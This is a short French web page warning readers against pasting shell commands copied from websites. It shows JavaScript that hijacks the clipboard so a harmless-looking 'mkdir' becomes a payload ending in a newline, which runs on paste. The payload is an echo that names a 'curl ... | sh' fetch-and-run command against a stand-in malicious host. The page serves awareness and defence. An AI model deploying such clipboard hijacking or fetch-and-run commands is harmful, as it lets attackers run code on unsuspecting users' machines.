Lorsque vous voyez une commande shell sur Internet, ne la copiez pas dans votre terminal.
Les API de presse-papiers JavaScript modernes permettent à un site Web d'écraser ce qui est ajouté au presse-papiers.
Voici un exemple de la simplicité de cette attaque.
mkdir mon_nouveau_dossier
Notez que vous n'avez même pas besoin de taper ENTER dans votre terminal après avoir collé pour que l'exploit se produise. La charge utile contient commodément une nouvelle ligne de fin qui le fait pour vous !
Voici le JavaScript qui exécute l'exploit:
document.getElementById('copyme').addEventListener('copy', function(e) {
e.clipboardData.setData('text/plain',
'echo "this could have been [curl http://monscriptmalveillant.edu | sh]"\n'
);
e.preventDefault();
});